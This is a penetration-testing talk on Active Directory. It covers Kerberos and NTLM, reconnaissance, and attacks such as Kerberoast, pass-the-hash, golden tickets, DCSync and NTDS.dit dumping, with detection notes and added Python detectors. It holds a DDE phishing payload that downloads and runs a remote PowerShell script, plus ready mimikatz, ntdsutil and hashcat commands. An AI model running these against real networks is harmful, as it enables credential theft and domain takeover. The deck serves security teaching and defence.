PENTESTING

ACTIVE DIRECTORY
Carlos García García

ciyinet
WHOAMI
Carlos García García
- Computer Science Engineer
- Penetration Testing and Red Teaming
- OSCP Certified
- Co-author of the book “Hacking Windows: Ataques a sistemas y redes Microsoft”

Pentesting Active Directory ciyinet 2


WHAT ARE WE GOING TO TALK ABOUT?
- Introduction to Active Directory
- Authentication Protocols
- Active Directory Penetration Testing
- Reconnaissance
- Common Attacks & Techniques
- Lateral and Vertical Movements
- How-to Avoid Being Caught

BEAR IN MIND
- AD-related techniques
- I learn Active Directory from the offensive side
- We lower risks and not the other way around
- This is going to be intense

ACTIVE DIRECTORY 101

ACTIVE DIRECTORY 101
• AD is Microsoft’s answer to directory services
• A directory service is a hierarchical structure that stores objects for quick access and management of all resources

ACTIVE DIRECTORY 101
• Uses LDAP as its access protocol
• Relies on DNS as its locator service, enabling clients to locate domain controllers through DNS queries
• AD supports several naming conventions
  • User Principal Names (UPN): user@domain
  • LDAP names (Distinguished Names):
    • cn=common name
    • ou=organizational unit
    • dc=domain
    • e.g. cn=ciyi, ou=Madrid, dc=Rooted, dc=CON

ACTIVE DIRECTORY 101
Just a Database: NTDS.dit

ACTIVE DIRECTORY 101
Domain Controllers and Domain Admins

CREDENTIALS FLOW IN WINDOWS

NTLM SCHEME
Protocol   Algorithm   Secret to use
LM         DES-ECB     Hash LM
NTLMv1     DES-ECB     Hash NT
NTLMv2     HMAC-MD5    Hash NT

KERBEROS SCHEME
Protocol   Secret to use
Kerberos   RC4 = Hash NT
           AES128 key
           AES256 key

KERBEROS SCHEME
1. The client encrypts a timestamp with his/her hash/key
2. The client receives a TGT signed with the domain krbtgt account that proves they are who they say they are
3. The TGT is then used to request service tickets (TGS) for specific resources/services on the domain
4. The DC sends a TGS ticket encrypted using the hash of the account that is associated with that service (SPN)

PENTESTING
ACTIVE DIRECTORY
Sure, but how about actually pentesting it?
ACTIVE DIRECTORY PENETRATION TESTING
The Goal

• Domain admins
• Enterprise admins
• Built-in administrators
• Account Operators
• Allowed RODC Password Replication Group
• Backup Operators
• DnsAdmins
• …

ACTIVE DIRECTORY PENETRATION TESTING
The real Goal!


ATTACK KILL CHAIN

Reference:
Microsoft Advanced Threat Analytics

PENTESTING
ACTIVE DIRECTORY
Infrastructure
PENTESTING
ACTIVE DIRECTORY
Classic Intrusion Scheme
PHISHING + DDEAUTO = RCE
• Dynamic Data Exchange (DDE): protocol for transferring data between applications
• Valid for MS Excel, MS Word… and MS Outlook
• Recently used for macro-less malware

DDEAUTO "C:\\Programs\\Microsoft\\Office365\\Outlook\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://172.16.201.201:8000/empire-test.ps1');powershell -e $e # " "Beneficios Qurtuba"

NEXT STEPS
• Persistence (userland)
• Reconnaissance
• Privilege escalation
• PowerSploit PowerUp
• Bypass UAC
•…
• Persistence (admin)
• Lateral and vertical movements
• Grab and exfiltrate trophies

PENTESTING
ACTIVE DIRECTORY
Reconnaissance
LOCAL RECONNAISSANCE
Collect information about the network, processes and OS in order to determine what kind of machine we have compromised.

Command                          Description
ipconfig /all                    Displays the IP address, subnet mask and default gateway for all adapters, plus DHCP and DNS settings
whoami /all                      Displays all information in the current access token, including the current user name, security identifiers (SIDs), privileges and the groups the user belongs to
net localgroup                   Displays the name of the server and the names of the local groups on the computer
net localgroup "administrators"  Displays the local administrators
netstat -an                      Displays active TCP connections, ports on which the computer is listening, Ethernet statistics and the IP routing table
tasklist /V                      Displays a list of applications and services with their Process ID (PID) for all tasks running on a local or remote computer

LOCAL RECONNAISSANCE
Collect information about the network, processes and OS in order to determine what kind of machine we have compromised.

Command                          Description
net start                        Lists started Windows services
sc qc <SERVICE>                  Gets the parameters of an individual service
accesschk.exe -ucqv <SERVICE>    Determines the access control rules of a service (accesschk.exe is part of the Microsoft Sysinternals suite)
systeminfo > info_output.txt     Displays detailed configuration information about a computer and its operating system, including OS configuration, security information, product ID and hardware properties such as RAM, disk space and network cards
schtasks /query /fo LIST /v      Lists scheduled tasks: whether they are recurring, where the task can be found and its parameters, as well as, crucially, what permissions they run with
dir, type, findstr               Browse and search for information in the local file system

NETWORK RECONNAISSANCE
Collect information about the network, processes and OS in order to determine what kind of machine we have compromised.

Command                                 Description
ping                                    ☺
echo %USERDOMAIN%                       Domain the host is joined to
echo %logonserver% / set logonserver    Obtains the name of the Domain Controller the host authenticated against
net group /domain                       Lists existing groups in the domain
net group "<GROUP NAME>" /domain        Lists members of a group, e.g. "domain computers", "domain controllers", "domain admins"
net localgroup administrators /domain   Gets members of the built-in group "Administrators"

NETWORK RECONNAISSANCE
Collect information about the network, processes and OS in order to determine what kind of machine we have compromised.

Command                          Description
net user /domain                 Lists all users within the current domain
net user <ACCOUNT NAME> /domain  Obtains detailed information about a user given their username
net view                         Displays a list of domains, computers or resources shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain
net use                          Access to shared resources
net accounts /domain             Obtains the domain password policy
nltest /domain_trusts            Maps trust relationships

PENTESTING
ACTIVE DIRECTORY
Common Attacks & Techniques
COMMON ATTACKS & TECHNIQUES
• Passwords in SYSVOL & Group Policy Preferences – 10%

• Missing Patches; Exploit the MS14-068 on a DC Missing the Patch – 5%

• Kerberos TGS Service Ticket Cracking (Kerberoast) – 20%

• SMB Shares Mining – 75%

• Credential Theft Shuffle (“Mimikatz dance”) – 60%

Reference:
https://adsecurity.org/?p=2362


KERBEROAST
1. Client encrypts a timestamp with his/her hash/key
2. Client receives a TGT signed with the domain krbtgt account that proves they are who they say they are
3. The TGT is then used (here by the attacker) to request service tickets (TGS) for specific resources/services on the domain
4. DC sends a TGS ticket encrypted using the hash of the account that is associated with that service (SPN)

KERBEROAST
• Offline brute force of service account passwords using their service tickets (TGS)
• No risk of detection
• No account lockouts

• Invoke-Kerberoast from PowerView (dev) to collect hashes

• Focus on user accounts. They have shorter passwords

• JohnTheRipper (magnumripper) to crack them

References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/magnumripper/JohnTheRipper

SMB SHARES MINING
• Usually very fruitful, but sometimes boring and time-consuming
• Enumerating shares in the environment and looking for data with hardcoded creds (scripts, config files), backups, documentation…

PowerView Find-ShareDomain
• Searches for computer shares on the domain. If -CheckShareAccess is passed, then only
shares the current user has read access to are returned.

smbmap
• Intended to simplify searching for potentially sensitive data across large networks.
• Enumerates samba share drives across an entire domain. List drives, permissions, contents,
upload/download functionality, file name auto-download pattern matching, etc.

Reference:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/ShawnDEvans/smbmap

CREDENTIAL THEFT SHUFFLE
• Escalating privileges on some machine
• Extracting creds/hashes from memory
• Derivative administrator
• User hunting: moving laterally and repeating the attack till Domain
Admin level is reached
“Mimikatz dance”

References:
https://github.com/gentilkiwi/mimikatz

DERIVATIVE ADMINISTRATOR

USER HUNTING
List local admins remotely
• Get-localadmin (Script)
• Get-NetLocalGroup (PowerView)
List active sessions remotely
• PsLoggedon (Sysinternals)
• Get-NetLoggedon (PowerView)
• Get-NetSession (PowerView)
• Tasklist
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://docs.microsoft.com/en-us/sysinternals/
https://gitlab.com/ciyinet/ciyinotes/blob/master/Microsoft%20Windows/readme.md

USER HUNTING
• Invoke-UserHunter (PowerView)

• BloodHound

1. Gets groups and group members of each group


2. Lists domain computers
3. Obtains local admins for each computer
4. Lists active sessions on each computer

References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/BloodHoundAD/BloodHound

Creds dump + Privs escalation
NTLM RELAY

PASS-THE-HASH
Protocol   Algorithm   Secret to use
LM         DES-ECB     Hash LM
NTLMv1     DES-ECB     Hash NT
NTLMv2     HMAC-MD5    Hash NT
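The "Secret to use" column of the NTLM scheme and of this pass-the-hash slide is the whole story: as an added example (not from the deck), the Python below computes an NTLMv2 response and verifies it the way a DC would, following MS-NLMP, so that both sides are seen to need nothing but the NT hash, which is why a leaked hash is a password equivalent. The NT hash, server challenge and client nonce are constructed demo values.

```python
import hmac
import hashlib
import struct

def ntowf_v2(nt_hash, user, domain):
    """NTOWFv2 (MS-NLMP 3.3.2): HMAC-MD5 keyed with the 16-byte NT hash over
    UPPER(user) + domain in UTF-16LE. The password itself is never needed."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"),
                    hashlib.md5).digest()

def build_blob(filetime, client_nonce, target_info=b""):
    """Minimal NTLMv2_CLIENT_CHALLENGE: RespType=1, HiRespType=1, 6 reserved
    bytes, 8-byte FILETIME, 8-byte client challenge, reserved, AV pairs, reserved."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", filetime)
            + client_nonce + b"\x00" * 4 + target_info + b"\x00" * 4)

def ntlmv2_response(nt_hash, user, domain, server_challenge, blob):
    """Client side: NTProofStr || blob, with NTProofStr = HMAC-MD5 over the
    8-byte server challenge and the client blob, keyed with NTOWFv2."""
    nt_proof = hmac.new(ntowf_v2(nt_hash, user, domain),
                        server_challenge + blob, hashlib.md5).digest()
    return nt_proof + blob

def verify_ntlmv2(stored_nt_hash, user, domain, server_challenge, response):
    """Server/DC side: recompute NTProofStr from the *stored NT hash* and
    compare in constant time. The verifier holds nothing but the hash, so
    whoever obtains that hash can answer any challenge (pass-the-hash)."""
    nt_proof, blob = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(stored_nt_hash, user, domain),
                        server_challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(nt_proof, expected)

# Constructed demo values (not real credentials or captured traffic).
DEMO_NT_HASH = bytes.fromhex("0123456789abcdef0123456789abcdef")
DEMO_CHALLENGE = bytes.fromhex("1122334455667788")
DEMO_BLOB = build_blob(131642028000000000, bytes.fromhex("a1a2a3a4a5a6a7a8"))

def demo(nt_hash=DEMO_NT_HASH):
    """Authenticate as 'ciyi' with the given NT hash; True if the DC accepts."""
    resp = ntlmv2_response(nt_hash, "ciyi", "ROOTED", DEMO_CHALLENGE, DEMO_BLOB)
    return verify_ntlmv2(DEMO_NT_HASH, "ciyi", "ROOTED", DEMO_CHALLENGE, resp)
```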


OVERPASS-THE-HASH (PASS-THE-KEY)
Protocol   Secret to use
Kerberos   RC4 = Hash NT
           AES128 key
           AES256 key

References:
http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash

(OVER)PASS-THE-HASH

mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /run:PROGRAM"

PASS-THE-TICKET
• Inject Kerberos tickets
• Tickets must be in Kerberos credential format (KRB_CRED): http://tools.ietf.org/html/rfc4120#section-5.8
• The Kerberos module does not require any privilege; it uses the official Microsoft Kerberos API

mimikatz.exe "kerberos::ptt FILENAME"

GOLDEN TICKET
Holding the krbtgt account hash (krbtgt:hash), the attacker forges a TGT encrypted with it. The TGT carries:
• Username
• Group membership
• …

GOLDEN TICKET
The KRBTGT hash can be used to generate arbitrary TGTs:
• Made by the attacker, not the KDC
• Anything can be pushed inside

mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /user:USERNAME /id:ID /groups:500,501,513,512,520,518,519 /ptt"

DCSYNC
• It “impersonates” a Domain Controller and requests account password data from the targeted Domain Controller
• Replicates the user credentials via GetNCChanges (Directory Replication Service (DRS) Remote Protocol)
• Special rights are required to run DCSync

mimikatz.exe "lsadump::dcsync /dc:DC /domain:DOMAIN /user:USERNAME" exit

mimikatz.exe "lsadump::dcsync /all /csv" exit

DCSHADOW
Register new domain controllers to inject malicious AD objects and so create backdoors or any kind of illegitimate access or right

Reference:
https://blog.alsid.eu/dcshadow-explained-4510f52fc19d

PENTESTING
ACTIVE DIRECTORY
dir is boring, show me how to RCE
REMOTE CODE EXECUTION
AT
at \\TARGET_HOST HH:MM EXECUTABLE

Schtasks
schtasks /create /tn TASK_NAME /tr EXECUTABLE /sc once /st 00:00 /S TARGET_HOST /RU System
schtasks /run /tn TASK_NAME /S TARGET_HOST

SC
sc \\TARGET_HOST create SERVICE_NAME binpath= "EXECUTABLE"
sc \\TARGET_HOST start SERVICE_NAME

REMOTE CODE EXECUTION
WMIC
wmic /node:TARGET_HOST process call create "EXECUTABLE"

WinRM
Invoke-Command -ComputerName TARGET_HOST -ScriptBlock { COMMAND(S) }

PsExec
PsExec.exe \\TARGET_HOST -u USER PROCESS

PENTESTING
ACTIVE DIRECTORY
Let’s grab the NTDS.dit DB
NTDS.DIT

NTDS.DIT
How to get hashes from it:
1. Decrypt the Password Encryption Key (PEK); the PEK is encrypted using the bootkey
2. First round of hash decryption with the PEK using RC4
3. Second round of hash decryption with DES

GRAB NTDS.DIT AND SYSTEM
Volume Shadow Copy
vssadmin create shadow /for=C:

Ntdsutil
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit

Invoke-NinjaCopy
Invoke-NinjaCopy -Path "C:\Windows\NTDS\ntds.dit" -LocalDestination "C:\ntds.dit"
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "C:\SYSTEM"

CRACKING NT HASHES
John the Ripper
john FILE_HASHES --format=NT

Hashcat & Rockyou wordlist
hashcat -a 0 -m 1000 --username FILE_HASHES /usr/share/wordlists/rockyou.txt --potfile-path OUTPUT_NT.pot

PENTESTING
ACTIVE DIRECTORY
But how about the blue team?
Microsoft ATA
PASS-THE-HASH
• Based on local Security events
• Not captured by ATA by default
• Force NTLM to be used

• Overpass-the-hash: encryption downgrade is detected

mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM" exit

GOLDEN TICKET
• Same as overpass-the-hash
• Detection based on lifetime
• Default ticket lifetime in AD is 10 hours

mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600 /renewmax:10080 /user:USERNAME /ptt"
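A host-side illustration of the two ATA checks described on the overpass-the-hash and golden ticket slides, added here and not part of the deck: it parses a klist-style ticket dump and flags TGTs whose lifetime or renewal window exceeds the 10 h / 7 day defaults (the same values as /endin:600 and /renewmax:10080) or whose encryption is not AES. The klist output, realm and principal names are constructed.

```python
import re
from datetime import datetime, timedelta

# Policy defaults quoted in the deck: 10 h ticket life, 7 days renewal
# (the /endin:600 and /renewmax:10080 values, in minutes).
MAX_TICKET_LIFE = timedelta(minutes=600)
MAX_RENEW_LIFE = timedelta(minutes=10080)
STRONG_ETYPES = ("AES-256-CTS-HMAC-SHA1-96", "AES-128-CTS-HMAC-SHA1-96")

# Constructed klist-style output (not from a real host): one policy-conformant
# AES TGT and one RC4 TGT with a ten-year lifetime.
SAMPLE_KLIST = """\
#0>     Client: ciyi @ ROOTED.CON
        Server: krbtgt/ROOTED.CON @ ROOTED.CON
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 3/1/2018 10:00:00 (local)
        End Time:   3/1/2018 20:00:00 (local)
        Renew Time: 3/8/2018 10:00:00 (local)
#1>     Client: Administrator @ ROOTED.CON
        Server: krbtgt/ROOTED.CON @ ROOTED.CON
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 3/1/2018 10:00:00 (local)
        End Time:   2/27/2028 10:00:00 (local)
        Renew Time: 2/27/2028 10:00:00 (local)
"""

FIELD_RE = re.compile(r"^\s*(Client|Server|KerbTicket Encryption Type|Start Time|"
                      r"End Time|Renew Time):\s*(.+?)\s*(?:\(local\))?\s*$")
TS_FMT = "%m/%d/%Y %H:%M:%S"

def parse_klist(text):
    """Split a klist dump into one dict per ticket, keyed by field name."""
    tickets, current = [], None
    for line in text.splitlines():
        if line.startswith("#"):            # "#n>" opens a new ticket entry
            current = {}
            tickets.append(current)
            line = line.split(">", 1)[1]
        m = FIELD_RE.match(line)
        if m and current is not None:
            current[m.group(1)] = m.group(2)
    return tickets

def check_ticket(t):
    """Anomalies for one ticket: lifetime/renewal beyond policy (the golden
    ticket lifetime check) and a TGT not using AES (the downgrade check)."""
    ts = lambda key: datetime.strptime(t[key], TS_FMT)
    start, end, renew = ts("Start Time"), ts("End Time"), ts("Renew Time")
    findings = []
    if end - start > MAX_TICKET_LIFE:
        findings.append("ticket lifetime exceeds policy")
    if renew - start > MAX_RENEW_LIFE:
        findings.append("renewal lifetime exceeds policy")
    etype = t["KerbTicket Encryption Type"]
    if t["Server"].startswith("krbtgt/") and etype not in STRONG_ETYPES:
        findings.append("TGT encryption downgraded to " + etype)
    return findings

def audit(text):
    """Map each ticket's client principal to its anomaly list (empty = clean)."""
    return {t["Client"]: check_ticket(t) for t in parse_klist(text)}
```

A ticket forged with exactly the policy values, as on the slide above, passes the lifetime checks, which is why the encryption type and the issuing KDC still matter.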


DCSYNC
DRS traffic (DSGetNCChanges) from a non-DC to a DC system can be detected
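A host-log counterpart to that network detection, added here and not from the deck: Security event 4662 records directory-object access together with the requested control-access right GUIDs, so replication rights (DS-Replication-Get-Changes and -All) requested by anything other than a known DC account are the footprint of DCSync. The events and DC names are constructed, and the allow-list of legitimate replicators is an assumption of the example.

```python
import re

# Control access rights that Directory Replication Service (GetNCChanges)
# requests need; they appear as GUIDs in the Properties field of Security
# event 4662 once Directory Service Access auditing and a SACL on the domain
# object are in place. These GUIDs are the schema's own values.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

# Assumption for the example: the computer accounts of the real domain
# controllers (and any service account legitimately allowed to replicate).
KNOWN_REPLICATORS = {"DC01$", "DC02$"}

# Constructed 4662 EventData records (not from a real log).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "ROOTED",
     "ObjectServer": "DS", "AccessMask": "0x100",
     "Properties": "Control Access\r\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\r\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "ciyi", "SubjectDomainName": "ROOTED",
     "ObjectServer": "DS", "AccessMask": "0x100",
     "Properties": "Control Access\r\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\r\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "ciyi", "SubjectDomainName": "ROOTED",
     "ObjectServer": "DS", "AccessMask": "0x10",
     "Properties": "Read Property\r\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "SubjectUserName": "ciyi", "SubjectDomainName": "ROOTED"},
]

def replication_rights(properties):
    """Names of the replication rights referenced in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]

def detect_dcsync(events, known=KNOWN_REPLICATORS):
    """Flag replication-right access by any account that is not a known DC.
    Real DCs replicate constantly, so they are allow-listed; anything else
    asking for Get-Changes(-All) is the host-side footprint of DCSync."""
    alerts = []
    for e in events:
        if e.get("EventID") != 4662 or e.get("ObjectServer") != "DS":
            continue
        rights = replication_rights(e.get("Properties", ""))
        if not rights or e["SubjectUserName"] in known:
            continue
        alerts.append({
            "account": f"{e['SubjectDomainName']}\\{e['SubjectUserName']}",
            "rights": rights,
            # Get-Changes-All is the right that returns secret attributes
            "severity": "high" if "DS-Replication-Get-Changes-All" in rights else "medium",
        })
    return alerts
```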


PENTESTING ACTIVE DIRECTORY
Wrapping Up
• Plaintext creds
  • WDigest
  • SMB Mining
  • mimikittenz
  • LaZagne
  • WCMDump
• Hash
  • Memory dump
  • …

Access token: User SID, Group SIDs, Logon SID, others …

Logon session
• Run as
• NTLM Relay
• Pass-the-hash
• Pass-the-ticket
• Golden ticket

• PsExec
• WinRM
• AT
• Schtasks
• WMIC
• SC

• DCSync
• DCShadow
• Golden ticket
• SMB Mining


• NTDS.dit
  • Volume Shadow Copy
  • Ntdsutil
  • Invoke-NinjaCopy
  • DSInternals
  • Impacket Secretsdump
  • Crack hashes
• Persistence
  • Golden ticket
  • Skeleton key
  • ACL-based backdoors
  • Malicious SSP
  • Password filters
  • …


BUSINESS RISK
Compromise of just one Domain Admin account in the Active Directory exposes the entire organization to risk. The attacker would have unrestricted access to all resources managed by the domain: all users, servers, workstations and data.

Moreover, the attacker could instantly establish persistence in the Active Directory environment, which is difficult to notice and cannot be efficiently remediated with guarantees.

“Once domain admin, always domain admin”

ACKNOWLEDGMENT & REFERENCES
• Miroslav Sotak and TVM team
• FWHIBBIT
• RootedCON and any other Sec Community in Spain

PENTESTING
ACTIVE DIRECTORY
Questions?
Answers

carlos@ciyi.es
ciyinet
ciyinet@protonmail.com
